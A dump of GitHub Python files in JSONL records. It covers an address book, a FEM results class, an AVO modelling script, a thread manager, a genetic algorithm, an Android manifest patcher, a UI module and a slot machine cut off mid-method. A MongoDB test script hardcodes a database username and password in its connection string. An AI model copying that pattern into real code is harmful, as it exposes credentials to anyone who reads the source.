`adressbuch` WHERE (Nummer = %s)\"\n data = (nummer,)\n\n cursor.execute(delete, data)\n cnx.commit()\n\ndef make_get_and_data_sql(dict):\n vorgaenger = False\n get = \"SELECT * FROM `adressbuch` \"\n\n if dict['Vorname'] is not None and vorgaenger is False:\n get += \" WHERE Vorname = %s\"\n data = (dict['Vorname'],)\n vorgaenger = True\n if dict['Nachname'] is not None and vorgaenger is False:\n get += \" WHERE Nachname = %s\"\n data = (dict['Nachname'],)\n vorgaenger = True\n elif dict['Nachname'] is not None and vorgaenger is not False:\n get += \" and Nachname = %s\"\n li = list(data)\n li.append(dict['Nachname'])\n data = tuple(li)\n if dict['Straße'] is not None and vorgaenger is False:\n get += \" WHERE Straße = %s\"\n data = (dict['Straße'],)\n vorgaenger = True\n elif dict['Straße'] is not None and vorgaenger is not False:\n get += \" and Straße = %s\"\n li = list(data)\n li.append(dict['Straße'])\n data = tuple(li)\n if dict['HausNr'] is not None and vorgaenger is False:\n get += \" WHERE HausNr = %s\"\n data = (dict['HausNr'],)\n vorgaenger = True\n elif dict['HausNr'] is not None and vorgaenger is not False:\n get += \" and HausNr = %s\"\n li = list(data)\n li.append(dict['HausNr'])\n data = tuple(li)\n if dict['Ort'] is not None and vorgaenger is False:\n get += \" WHERE Ort = %s\"\n data = (dict['Ort'],)\n vorgaenger = True\n elif dict['Ort'] is not None and vorgaenger is not False:\n get += \" and Ort = %s\"\n li = list(data)\n li.append(dict['Ort'])\n data = tuple(li)\n if dict['PLZ'] is not None and vorgaenger is False:\n get += \" WHERE PLZ = %s\"\n data = (dict['PLZ'],)\n vorgaenger = True\n elif dict['PLZ'] is not None and vorgaenger is not False:\n get += \" and PLZ = %s\"\n li = list(data)\n li.append(dict['PLZ'])\n data = tuple(li)\n if dict['Land'] is not None and vorgaenger is False:\n get += \" WHERE Land = %s\"\n data = (dict['Land'],)\n vorgaenger = True\n elif dict['Land'] is not None and vorgaenger is not False:\n get += \" and Land = %s\"\n li = list(data)\n li.append(dict['Land'])\n data = tuple(li)\n\n if dict['birthdateDay'] is not None and vorgaenger is False:\n get += \" WHERE DAY(birthdate)= %s\"\n data = (dict['birthdateDay'],)\n vorgaenger = True\n elif dict['birthdateDay'] is not None and vorgaenger is not False:\n get += \" and DAY(birthdate) = %s\"\n li = list(data)\n li.append(dict['birthdateDay'])\n data = tuple(li)\n if dict['birthdateMonth'] is not None and vorgaenger is False:\n get += \" WHERE MONTH(birthdate)= %s\"\n data = (dict['birthdateMonth'],)\n vorgaenger = True\n elif dict['birthdateMonth'] is not None and vorgaenger is not False:\n get += \" and MONTH(birthdate) = %s\"\n li = list(data)\n li.append(dict['birthdateMonth'])\n data = tuple(li)\n if dict['birthdateYear'] is not None and vorgaenger is False:\n get += \" WHERE YEAR(birthdate)= %s\"\n data = (dict['birthdateYear'],)\n vorgaenger = True\n elif dict['birthdateYear'] is not None and vorgaenger is not False:\n get += \" and YEAR(birthdate) = %s\"\n li = list(data)\n li.append(dict['birthdateYear'])\n data = tuple(li)\n\n if dict['Nummer'] is not None and vorgaenger is False:\n get += \" WHERE Nummer = %s\"\n data = (dict['Nummer'],)\n elif dict['Nummer'] is not None and vorgaenger is not False:\n get += \" and Nummer = %s\"\n li = list(data)\n li.append(dict['Nummer'])\n data = tuple(li)\n\n return get, data\n\nMain()\n","repo_name":"Mai65/Adressbuch","sub_path":"venv/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":19553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25335475951","text":"'''\nWritten by: Orvin Demsy\nDate: 17 August 2019\n\nThis solution of mine is similar to the one provided online\nhttps://coderbyte.com/solution/Simple%20Adding#Python\n\nChallenge:\nHave the function SimpleAdding(num) add up all the numbers from 1 to num. For example: if the input is 4 then your program should return 10 because 1 + 2 + 3 + 4 = 10. For the test cases, the parameter num will be any number from 1 to 1000.\nSample Test Cases\n\nSample output:\nInput:12\nOutput:78\n\nInput:140\nOutput:9870\n'''\n\ndef simpleAdding(num):\n #declaring variable as total addition\n total = 0\n\n #generate num-iteration starting from 1\n for i in range(1, num+1):\n total = total + i\n\n return total\n\nnum = 4\n\nprint(simpleAdding(num))","repo_name":"orvindemsy/python-practice","sub_path":"19.08.16 beginner project/simpleAdding.py","file_name":"simpleAdding.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13792263628","text":"class FEMEMResult:\n def __init__(self, **kwargs):\n self.runtime = kwargs.get('runtime')\n self.total_potential = kwargs.get('fun')\n self.total_weight = kwargs.get('total_weight')\n self.best_solution = kwargs.get('u')\n\n self.total_iterations = kwargs.get('nit')\n self.total_evaluations = kwargs.get('nfev')\n\n self.restraints = kwargs.get('r')\n self.displacements = kwargs.get('u')\n self.elongation_rate = kwargs.get('n')\n self.stress = kwargs.get('s')\n # self.strain: list = []\n\n def __repr__(self):\n return \"\"\"\n FEMEM Results:\n \n Runtime : {runtime:.4f} seconds\n Total Potential : {total_potential}\n Total Weight : {total_weight}\n Best Solution : {best_solution}\n Total Iterations : {total_iterations}\n Total Evaluations : {total_evaluations}\n Restraints : {restraints}\n Displacements : {displacements}\n Elongation Rate : {elongation_rate}\n Stress : {stress}\n \"\"\".format(**self.__dict__)\n","repo_name":"batuhan0sanli/femem","sub_path":"femem_package/femem/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28114517810","text":"import numpy as np\nfrom scipy.signal import filtfilt\n\nimport pylops\nfrom pylops.utils.wavelets import ricker\n\n# plt.close(\"all\")\nnp.random.seed(0)\n\n# sphinx_gallery_thumbnail_number = 5\n\n# model\nnt0 = 301\ndt0 = 0.002\n\nt0 = np.arange(nt0) * dt0\nvp = 1200 + np.arange(nt0) + filtfilt(np.ones(5) / 5.0, 1, np.random.normal(0, 80, nt0))\nvs = 600 + vp / 2 + filtfilt(np.ones(5) / 5.0, 1, np.random.normal(0, 20, nt0))\nrho = 1000 + vp + filtfilt(np.ones(5) / 5.0, 1, np.random.normal(0, 30, nt0))\nvp[131:] += 500\nvs[131:] += 200\nrho[131:] += 100\nvsvp = 0.5\nm = np.stack((np.log(vp), np.log(vs), np.log(rho)), axis=1)\n\n# background model\nnsmooth = 50\nmback = filtfilt(np.ones(nsmooth) / float(nsmooth), 1, m, axis=0)\n\n# angles\nntheta = 21\nthetamin, thetamax = 0, 35\ntheta = np.linspace(thetamin, thetamax, ntheta)\n\n# wavelet\nntwav = 77\nwav = ricker(t0[: ntwav // 2 + 1], 35)[0]\n\n# lop\nPPop = pylops.avo.prestack.PrestackLinearModelling(\n wav, theta, vsvp=vsvp, nt0=nt0, linearization=\"akirich\"\n)\n\n# dense\nPPop_dense = pylops.avo.prestack.PrestackLinearModelling(\n wav, theta, vsvp=vsvp, nt0=nt0, linearization=\"akirich\", explicit=True\n)\n\n# data lop\ndPP = PPop * m.ravel()\ndPP = dPP.reshape(nt0, ntheta)\n\n# data dense\ndPP_dense = PPop_dense * m.T.ravel()\ndPP_dense = dPP_dense.reshape(ntheta, nt0).T\n\n# noisy data\ndPPn_dense = dPP_dense + np.random.normal(0, 1e-2, dPP_dense.shape)\n\n\nfile_path = \"D:/code_projects/matlab_projects/src/trans_gan_inversion/dPP_dense.mat\"\n\nimport scipy.io as scio\nscio.savemat(file_path, dict(dPP_dense=dPP_dense, vp=vp, vs=vs, rho=rho/1000))","repo_name":"stepbystep88/TransGanInversion","sub_path":"test/plot_avo.py","file_name":"plot_avo.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"2276919861","text":"\nimport threading\nimport logging\nfrom queue import Queue\nimport psutil\nfrom threading import Event\nfrom .task import Task\nfrom .managed_thread import ManagedThread\n\nlogging.basicConfig(level=logging.INFO)\n\nclass ThreadManager:\n def __init__(self):\n self.threads = []\n self.shutdown_event = Event()\n self.create_thread()\n\n def create_thread(self):\n task_queue = Queue()\n thread = ManagedThread(task_queue, self.shutdown_event)\n thread.start()\n self.threads.append({'thread': thread, 'queue': task_queue})\n\n def add_task(self, func, rate_ms):\n task = Task(func, rate_ms)\n min_load_thread = min(self.threads, key=lambda x: x['thread'].load)\n\n cpu_usage = max(psutil.cpu_percent(percpu=True))\n if min_load_thread['thread'].load + rate_ms >500 or cpu_usage > 70:\n self.create_thread()\n min_load_thread = self.threads[-1]\n\n min_load_thread['thread'].load += rate_ms\n min_load_thread['queue'].put(task)\n logging.info(f\"Task added to thread {min_load_thread['thread'].name} with load {min_load_thread['thread'].load}\")\n\n def shutdown(self):\n logging.info(\"Initiating graceful shutdown...\")\n self.shutdown_event.set()\n for t in self.threads:\n t['thread'].join()\n ","repo_name":"benjamincham/ThreadShare","sub_path":"ThreadShare/thread_manager.py","file_name":"thread_manager.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"13172716342","text":"import numpy as np\nfrom random import randint, uniform\nimport pickle\nimport os\nfrom threading import Lock\n\nchromsize=83\n\ndef CreateChromossome(size):\n return np.random.uniform(-1,1,[size])\n\ndef CreateInitialPopulation():\n #Creates a initial population of 100\n pop=[]\n \n #The list of population is composed of itens of the form [ChromName, Chromossome]\n for i in range(100):\n chromname='Gen1_chrom'+str(i)\n pop.append([chromname,CreateChromossome(chromsize)])\n \n return pop\n\ndef son(p1,p2):\n \n son=[]\n for i in range(len(p1)):\n j=randint(1,3)\n #The son's attributes are randomly selected\n if(j==1):\n son.append(p1[i])\n else:\n son.append(p2[i])\n return np.array(son)\n\ndef mutate(subj):\n \n mutated_subject=[]\n for f in subj:\n odds=randint(0,2)\n if(odds==0):\n gene=uniform(-1,1)\n mutated_subject.append(gene)\n else:\n mutated_subject.append(f)\n return np.array(mutated_subject)\n\ndef mutate_pop(pop):\n \n mutated_pop=[]\n for s in pop:\n odds=randint(0,2)\n if(odds==0):\n mutated_pop.append(mutate(s))\n else:\n mutated_pop.append(s)\n return np.array(mutated_pop)\n\ndef breed(population):\n \n sorted_pop=sorted(population,key=lambda x: x[2],reverse=True)\n most_adapted=sorted_pop[:10]\n print(\"most_adapted\")\n print([(x[0],x[2]) for x in most_adapted])\n print(\"----------------------------------\")\n next_pop=[]\n \n while(len(next_pop)<100):\n #selecting the parents\n p1=randint(0,9)\n p2=randint(0,9)\n next_pop.append(son(most_adapted[p1][1],most_adapted[p2][1]))\n \n return np.array(next_pop)\n\ndef name_pop(pop,gen):\n \n named_pop=[]\n i=0\n base_name=\"Gen\"+str(gen)+\"_chrom\"\n for s in pop:\n named_pop.append([(base_name+str(i)), s])\n i+=1\n return named_pop\n\nclass SubjectPool:\n \n def __init__(self):\n \n #List of the subjects of the form [ChromName, Chromossome]\n genn=os.listdir(\"Gen2/\")\n genn=sorted(genn,key=lambda x: int(x.split(\"_\")[1]),reverse=True)\n print(genn)\n print(genn[0])\n self.population=pickle.load( open(\"Gen2/\" +genn[0], \"rb\" ) )\n self.iterator=0\n self.lock=Lock()\n self.fit_count=0\n self.generation=int(genn[0].split(\"_\")[1])\n \n def set_fitness(self,fitness):\n \n #Sets the fitness of a given subject indexed by iterator\n self.lock.acquire()\n self.population[self.iterator].append(fitness)\n self.fit_count+=1\n self.lock.release()\n \n def get_subj(self):\n\n self.lock.acquire()\n \n if(self.iterator>=100 and self.fit_count>=100):\n self.generation+=1\n new_pop=breed(self.population)\n new_pop=mutate_pop(new_pop)\n new_pop=name_pop(new_pop,self.generation)\n pickle.dump( self.population, open(\"Gen2/Gen_\"+str(self.generation)+\"_.gen\", \"wb\" ) )\n self.population=new_pop\n self.iterator=0\n\n index=self.iterator%100\n self.iterator+=1\n self.lock.release()\n return self.population[index]","repo_name":"Ferch42/Snaike","sub_path":"PopulationTools.py","file_name":"PopulationTools.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22919070550","text":"from lxml import etree\nfrom typing import Tuple\n\nPACKAGE_TAG = 'package'\nAPPLICATION_TAG = 'application'\nAPPLICATION_NAME_ATTRIBUTE = '{http://schemas.android.com/apk/res/android}name'\n\n\ndef get_application_name_and_package(manifest_path: str, default_app_name: str = '') -> Tuple[str, str]:\n parsed_manifest = etree.parse(manifest_path)\n root = parsed_manifest.getroot()\n app_tag = root.find(APPLICATION_TAG)\n if app_tag is not None:\n app_name = app_tag.get(APPLICATION_NAME_ATTRIBUTE)\n if not app_name:\n app_name = default_app_name\n app_tag.set(APPLICATION_NAME_ATTRIBUTE, app_name)\n print('Patching {}'.format(manifest_path))\n parsed_manifest.write(manifest_path)\n else:\n app_name = default_app_name\n etree.SubElement(root, APPLICATION_TAG, attrib={APPLICATION_NAME_ATTRIBUTE: app_name})\n print('Patching {}'.format(manifest_path))\n parsed_manifest.write(manifest_path)\n package = root.get(PACKAGE_TAG, '')\n return app_name, package\n","repo_name":"guysaha1/appdome","sub_path":"fusion_engine/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32502851903","text":"from pymongo import MongoClient\n# pprint library is used to make the output look more pretty\nfrom pprint import pprint\n# connect to MongoDB, change the << MONGODB URL >> to reflect your own connection string\nclient = MongoClient(\"mongodb+srv://user1:user1pw@msmongo1.x30yk.mongodb.net/mytestdb?retryWrites=true&w=majority\")\ndb=client['mytestdb']\n# print the contents of collection\ntestCollectionDocs=db[\"testCollection\"].find()\nfor doc in testCollectionDocs:\n pprint(doc)\n","repo_name":"smchitre/msmongo_hackathon","sub_path":"mongodb_atlas_test.py","file_name":"mongodb_atlas_test.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1048135838","text":"from fusionengine.files.imports import *\nimport fusionengine.files.draw as draw\nimport fusionengine.files.window as windowfe\nimport fusionengine.files.shape as shape\n\n\nclass _CustomButton:\n def __init__(\n self, window: windowfe._CustomRenderer, rect: shape._CustomShape, text: str\n ) -> None:\n \"\"\"A class that creates a new custom button. (Not for the user)\"\"\"\n\n self.manager = window.manager\n self.text = text\n self.x = rect.x\n self.y = rect.y\n self.width = rect.width\n self.height = rect.height\n\n self.button = gui.elements.UIButton(\n relative_rect=rect.rect, text=\"Say Hello\", manager=self.manager\n )\n\n def button_pressed(self) -> bool:\n \"\"\"Returns if the button is pressed.\"\"\"\n return self.button.check_pressed()\n\n\nclass Button:\n def new_button(\n self, window: windowfe._CustomRenderer, rect: shape._CustomShape, text: str\n ) -> _CustomButton:\n \"\"\"Creates a new button for your ui.\"\"\"\n return _CustomButton(window, rect, text)\n\n\nclass Text:\n def print_text(\n self,\n window: windowfe._CustomRenderer,\n text: str,\n x: int,\n y: int,\n font_path: str,\n font_size: int,\n color: tuple,\n ) -> None:\n \"\"\"Prints text on the screen.\"\"\"\n\n if os.path.exists(font_path):\n font = pg.font.Font(font_path, font_size)\n else:\n font = pg.font.SysFont(font_path, font_size)\n\n txtsurf = font.render(text, True, color)\n\n window.window.blit(txtsurf, (x, y))\n\n\nclass UI:\n def __init__(self) -> None:\n \"\"\"A class that creates a new ui.\"\"\"\n self.button = Button()\n self.text = Text()\n","repo_name":"dimkauzh/fusion-engine","sub_path":"src/fusionengine/files/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"60"} +{"seq_id":"72279783871","text":"from Tkinter import *\n\nimport random\n\n#create the MyApp Class\nclass MySlotMachine:\n #Background and buttons are placed on the screen\n def __init__(self, parent):\n self.myParent = parent\n #creates a frame\n self.myContainer1 = Frame(parent)\n #show it on the screen\n self.myContainer1.pack()\n \n #Sets the Background\n self.BackgroundImage = PhotoImage(file=\"slot-machine.gif\")\n self.BackgroundLabel = Label(self.myContainer1)\n self.BackgroundLabel.configure(image = self.BackgroundImage, compound=CENTER)\n self.BackgroundLabel.pack()\n \n #Sets the spin buttons image\n SpinButton = PhotoImage(file=\"SpinButton.gif\")\n \n #the SpinButton attributes\n self.SpinButton = Button(self.myContainer1)\n self.SpinButton.configure(image=SpinButton, height=50, width=60)\n #display SpinButton\n self.SpinButton.pack()\n self.SpinButton.place(x=315, y=340)\n #Bind SpinButton with SpinButtonClick\n PlayerCredits = 500\n PlayerBet = 0\n self.SpinButton.bind(\"\", self.SpinButtonClick)\n self.SpinButton.image = SpinButton\n \n #Sets the reset buttons image\n ResetButton = PhotoImage(file=\"Reset.gif\")\n \n #the ResetButton attributes\n self.ResetButton = Button(self.myContainer1)\n self.ResetButton.configure(image=ResetButton, height=35, width=35 )\n #display ResetButton\n self.ResetButton.pack()\n self.ResetButton.place(x=40, y=350)\n #Bind ResetButton with ResetButtonClick\n self.ResetButton.bind(\"\", self.ResetButtonClick)\n self.ResetButton.image = ResetButton\n \n #Sets the bet one image\n BetOneButton = PhotoImage(file=\"BetOne.gif\")\n \n #the BetOneButton attributes\n self.BetOneButton = Button(self.myContainer1)\n self.BetOneButton.configure(image=BetOneButton, height=35, width=35 )\n #display BetOneButton\n self.BetOneButton.pack()\n self.BetOneButton.place(x=155, y=350)\n #Bind BetOneButton with BetOneButtonClick\n self.BetOneButton.bind(\"\", self.BetOneButtonClick)\n self.BetOneButton.image = BetOneButton\n\n #Sets the bet tens button image\n BetTenButton = PhotoImage(file=\"BetTen.gif\")\n \n #the BetTenButton attributes\n self.BetTenButton = Button(self.myContainer1)\n self.BetTenButton.configure(image=BetTenButton, height=35, width=35 )\n #display BetTenButton\n self.BetTenButton.pack()\n self.BetTenButton.place(x=128, y=403)\n #Bind BetTenButton with BetTenButtonClick\n self.BetTenButton.bind(\"\", self.BetTenButtonClick)\n self.BetTenButton.image = BetTenButton\n \n #Sets the betfive buttons image\n BetFiveButton = PhotoImage(file=\"BetFive.gif\")\n \n #the BetFiveButton attributes\n self.BetFiveButton = Button(self.myContainer1)\n self.BetFiveButton.configure(image=BetFiveButton, height=35, width=35 )\n #display BetFiveButton\n self.BetFiveButton.pack()\n self.BetFiveButton.place(x=67, y=403)\n #Bind BetFiveButton with BetFiveButtonClick\n self.BetFiveButton.bind(\"\", self.BetFiveButtonClick)\n self.BetFiveButton.image = BetFiveButton\n \n #Sets the bet fifty buttons image\n BetFiftyButton = PhotoImage(file=\"BetFifty.gif\")\n \n #the BetFiftyButton attributes\n self.BetFiftyButton = Button(self.myContainer1)\n self.BetFiftyButton.configure(image=BetFiftyButton, height=35, width=35 )\n #display BetFiftyButton\n self.BetFiftyButton.pack()\n self.BetFiftyButton.place(x=188, y=403)\n #Bind BetFiftyButton with BetFiftyButtonClick\n self.BetFiftyButton.bind(\"\", self.BetFiftyButtonClick)\n self.BetFiftyButton.image = BetFiftyButton\n \n #Sets the Max Bet Buttons image\n BetMaxButton = PhotoImage(file=\"BetMax.gif\")\n \n #the BetMaxButton attributes\n self.BetMaxButton = Button(self.myContainer1)\n self.BetMaxButton.configure(image=BetMaxButton, height=35, width=35 )\n #display BetMaxButton\n self.BetMaxButton.pack()\n self.BetMaxButton.place(x=214, y=350)\n #Bind BetMaxButton with BetMaxButtonClick\n self.BetMaxButton.bind(\"\", self.BetMaxButtonClick)\n self.BetMaxButton.image = BetMaxButton\n \n #Sets and displays the Bet Text Label Text and Colour \n self.BetTextLabel = Label(self.myContainer1)\n self.BetTextLabel.configure(text = (PlayerBet), fg=\"#FF4500\", bg=\"#000000\", font=\"DS_DIGI.TTF\")\n self.BetTextLabel.pack()\n self.BetTextLabel.place(x=170, y=260)\n \n #sets and displays the Credit Text label text and colour\n self.CreditTextLabel = Label(self.myContainer1)\n self.CreditTextLabel.configure(text = (PlayerCredits), fg=\"#FF4500\", bg=\"#000000\", font=\"DS_DIGI.TTF\")\n self.CreditTextLabel.pack()\n self.CreditTextLabel.place(x=100, y=260)\n \n #When the spin button is clicked\n def SpinButtonClick(self, event): \n \n #Calls the random spin function\n Fruit_Reel = self.SpinReels()\n \n \n #Gets the values from the spin and assigns an image to the value. Image is then posted to the screen\n \n #Image for the first reel\n if Fruit_Reel[0] >= 1 and Fruit_Reel[0] <=26:\n Reel1Image = PhotoImage(file=\"Blank.gif\")\n self.Reel1Label = Label(self.myContainer1)\n self.Reel1Label.configure(image = Reel1Image)\n self.Reel1Label.pack()\n self.Reel1Label.place(x=60, y=145)\n self.Reel1Label.image = Reel1Image \n elif Fruit_Reel[0] >= 27 and Fruit_Reel[0] <=36:\n Reel1Image = PhotoImage(file=\"Strawberry.gif\")\n self.Reel1Label = Label(self.myContainer1)\n self.Reel1Label.configure(image = Reel1Image)\n self.Reel1Label.pack()\n self.Reel1Label.place(x=60, y=145)\n self.Reel1Label.image = Reel1Image\n elif Fruit_Reel[0] >= 37 and Fruit_Reel[0] <=45:\n Reel1Image = PhotoImage(file=\"Apple.gif\")\n self.Reel1Label = Label(self.myContainer1)\n self.Reel1Label.configure(image = Reel1Image)\n self.Reel1Label.pack()\n self.Reel1Label.place(x=60, y=145)\n self.Reel1Label.image = Reel1Image\n elif Fruit_Reel[0] >= 46 and Fruit_Reel[0] <=53:\n Reel1Image = PhotoImage(file=\"HorseShoe.gif\")\n self.Reel1Label = Label(self.myContainer1)\n self.Reel1Label.configure(image = Reel1Image)\n self.Reel1Label.pack()\n self.Reel1Label.place(x=60, y=145)\n self.Reel1Label.image = Reel1Image\n elif Fruit_Reel[0] >= 54 and Fruit_Reel[0] <=58:\n Reel1Image = PhotoImage(file=\"Clover.gif\")\n self.Reel1Label = Label(self.myContainer1)\n self.Reel1Label.configure(image = Reel1Image)\n self.Reel1Label.pack()\n self.Reel1Label.place(x=60, y=145)\n self.Reel1Label.image = Reel1Image\n elif Fruit_Reel[0] >= 59 and Fruit_Reel[0] <=61:\n Reel1Image = PhotoImage(file=\"Bell.gif\")\n self.Reel1Label = Label(self.myContainer1)\n self.Reel1Label.configure(image = Reel1Image)\n self.Reel1Label.pack()\n self.Reel1Label.place(x=60, y=145)\n self.Reel1Label.image = Reel1Image\n elif Fruit_Reel[0] >= 62 and Fruit_Reel[0] <= 63:\n Reel1Image = PhotoImage(file=\"Diamond.gif\")\n self.Reel1Label = Label(self.myContainer1)\n self.Reel1Label.configure(image = Reel1Image)\n self.Reel1Label.pack()\n self.Reel1Label.place(x=60, y=145)\n self.Reel1Label.image = Reel1Image\n elif Fruit_Reel[0] == 64:\n Reel1Image = PhotoImage(file=\"Seven.gif\")\n self.Reel1Label = Label(self.myContainer1)\n self.Reel1Label.configure(image = Reel1Image)\n self.Reel1Label.pack()\n self.Reel1Label.place(x=60, y=145)\n self.Reel1Label.image = Reel1Image\n \n #Image for reel 2 \n if Fruit_Reel[1] >= 1 and Fruit_Reel[1] <=26:\n Reel2Image = PhotoImage(file=\"Blank.gif\")\n self.Reel2Label = Label(self.myContainer1)\n self.Reel2Label.configure(image = Reel2Image)\n self.Reel2Label.pack()\n self.Reel2Label.place(x=170, y=145)\n self.Reel2Label.image = Reel2Image \n elif Fruit_Reel[1] >= 27 and Fruit_Reel[1] <=36:\n Reel2Image = PhotoImage(file=\"Strawberry.gif\")\n self.Reel2Label = Label(self.myContainer1)\n self.Reel2Label.configure(image = Reel1Image)\n self.Reel2Label.pack()\n self.Reel2Label.place(x=170, y=145)\n self.Reel2Label.image = Reel2Image\n elif Fruit_Reel[1] >= 37 and Fruit_Reel[1] <=45:\n Reel2Image = PhotoImage(file=\"Apple.gif\")\n self.Reel2Label = Label(self.myContainer1)\n self.Reel2Label.configure(image = Reel2Image)\n self.Reel2Label.pack()\n self.Reel2Label.place(x=170, y=145)\n self.Reel2Label.image = Reel2Image\n elif Fruit_Reel[1] >= 46 and Fruit_Reel[1] <=53:\n Reel2Image = PhotoImage(file=\"HorseShoe.gif\")\n self.Reel2Label = Label(self.myContainer1)\n self.Reel2Label.configure(image = Reel2Image)\n self.Reel2Label.pack()\n self.Reel2Label.place(x=170, y=145)\n self.Reel2Label.image = Reel2Image\n elif Fruit_Reel[1] >= 54 and Fruit_Reel[1] <=58:\n Reel2Image = PhotoImage(file=\"Clover.gif\")\n self.Reel1Label = Label(self.myContainer1)\n self.Reel2Label.configure(image = Reel2Image)\n self.Reel2Label.pack()\n self.Reel2Label.place(x=170, y=145)\n self.Reel2Label.image = Reel2Image\n elif Fruit_Reel[1] >= 59 and Fruit_Reel[1] <=61:\n Reel2Image = PhotoImage(file=\"Bell.gif\")\n self.Reel2Label = Label(self.myContainer1)\n self.Reel2Label.configure(image = Reel2Image)\n self.Reel2Label.pack()\n self.Reel2Label.place(x=170, y=145)\n self.Reel2Label.image = Reel2Image\n elif Fruit_Reel[1] >= 62 and Fruit_Reel[1] <= 63:\n Reel2Image = PhotoImage(file=\"Diamond.gif\")\n self.Reel2Label = Label(self.myContainer1)\n self.Reel2Label.configure(image = Reel2Image)\n self.Reel2Label.pack()\n self.Reel2Label.place(x=170, y=145)\n self.Reel2Label.image = Reel2Image\n elif Fruit_Reel[1] == 64:\n Reel2Image = PhotoImage(file=\"Seven.gif\")\n self.Reel2Label = Label(self.myContainer1)\n self.Reel2Label.configure(image = Reel2Image)\n self.Reel2Label.pack()\n self.Reel2Label.place(x=170, y=145)\n self.Reel2Label.image = Reel2Image\n \n #Image for reel 3 \n if Fruit_Reel[2] >= 1 and Fruit_Reel[2] <=26:\n Reel3Image = PhotoImage(file=\"Blank.gif\")\n self.Reel3Label = Label(self.myContainer1)\n self.Reel3Label.configure(image = Reel3Image)\n self.Reel3Label.pack()\n self.Reel3Label.place(x=270, y=145)\n self.Reel3Label.image = Reel3Image \n elif Fruit_Reel[2] >= 27 and Fruit_Reel[2] <=36:\n Reel3Image = PhotoImage(file=\"Strawberry.gif\")\n self.Reel3Label = Label(self.myContainer1)\n self.Reel3Label.configure(image = Reel3Image)\n self.Reel3Label.pack()\n self.Reel3Label.place(x=270, y=145)\n self.Reel3Label.image = Reel3Image\n elif Fruit_Reel[2] >= 37 and Fruit_Reel[2] <=45:\n Reel3Image = PhotoImage(file=\"Apple.gif\")\n self.Reel3Label = Label(self.myContainer1)\n self.Reel3Label.configure(image = Reel3Image)\n self.Reel3Label.pack()\n self.Reel3Label.place(x=270, y=145)\n self.Reel3Label.image = Reel3Image\n elif Fruit_Reel[2] >= 46 and Fruit_Reel[2] <=53:\n Reel3Image = PhotoImage(file=\"HorseShoe.gif\")\n self.Reel3Label = Label(self.myContainer1)\n self.Reel3Label.configure(image = Reel3Image)\n self.Reel3Label.pack()\n self.Reel3Label.place(x=270, y=145)\n self.Reel3Label.image = Reel3Image\n elif Fruit_Reel[2] >= 54 and Fruit_Reel[2] <=58:\n Reel3Image = PhotoImage(file=\"Clover.gif\")\n self.Reel3Label = Label(self.myContainer1)\n self.Reel3Label.configure(image = Reel3Image)\n self.Reel3Label.pack()\n self.Reel3Label.place(x=270, y=145)\n self.Reel3Label.image = Reel3Image\n elif Fruit_Reel[2] >= 59 and Fruit_Reel[2] <=61:\n Reel3Image = PhotoImage(file=\"Bell.gif\")\n self.Reel3Label = Label(self.myContainer1)\n self.Reel3Label.configure(image = Reel3Image)\n self.Reel3Label.pack()\n self.Reel3Label.place(x=270, y=145)\n self.Reel3Label.image = Reel3Image\n elif Fruit_Reel[2] >= 62 and Fruit_Reel[2] <= 63:\n Reel3Image = PhotoImage(file=\"Diamond.gif\")\n self.Reel3Label = Label(self.myContainer1)\n self.Reel3Label.configure(image = Reel3Image)\n self.Reel3Label.pack()\n self.Reel3Label.place(x=270, y=145)\n self.Reel3Label.image = Reel3Image\n elif Fruit_Reel[2] == 64:\n Reel3Image = PhotoImage(file=\"Seven.gif\")\n self.Reel3Label = Label(self.myContainer1)\n self.Reel3Label.configure(image = Reel3Image)\n self.Reel3Label.pack()\n self.Reel3Label.place(x=270, y=145)\n self.Reel3Label.image = Reel3Image\n\n #The random spin function\n def SpinReels(self):\n Bet_Line = [\" \",\" \",\" \"]\n Outcome = [0,0,0]\n \n # Spin those reels\n for spin in range(3):\n Outcome[spin] = random.randrange(1,65,1)\n # Spin those Reels!\n if Outcome[spin] >= 1 and Outcome[spin] <=26: # 40.10% Chance\n Bet_Line[spin] = \"Blank\"\n if Outcome[spin] >= 27 and Outcome[spin] <=36: # 16.15% Chance\n Bet_Line[spin] = \"Strawbeery\"\n if Outcome[spin] >= 37 and Outcome[spin] <=45: # 13.54% Chance\n Bet_Line[spin] = \"Apple\"\n if Outcome[spin] >= 46 and Outcome[spin] <=53: # 11.98% Chance\n Bet_Line[spin] = \"HorseShoe\"\n if Outcome[spin] >= 54 and Outcome[spin] <=58: # 7.29% Chance\n Bet_Line[spin] = \"Clover\"\n if Outcome[spin] >= 59 and Outcome[spin] <=61: # 5.73% Chance\n Bet_Line[spin] = \"Bell\"\n if Outcome[spin] >= 62 and Outcome[spin] <=63: # 3.65% Chance\n Bet_Line[spin] = \"Diamond\" \n if Outcome[spin] == 64: # 1.56% Chance\n Bet_Line[spin] = \"Seven\" \n return Outcome\n \n #Button that closes the window\n def ResetButtonClick(self, event):\n self.myParent.destroy()\n \n #Changes the bet value \n def BetOneButtonClick(self, event):\n self.BetTextLabel.configure(text = \" \", bg=\"#000000\")\n PlayerBet = 1\n self.BetTextLabel = Label(self.myContainer1)\n self.BetTextLabel.configure(text = (PlayerBet), fg=\"#FF4500\", bg=\"#000000\", font=\"DS_DIGI.TTF\")\n self.BetTextLabel.pack()\n 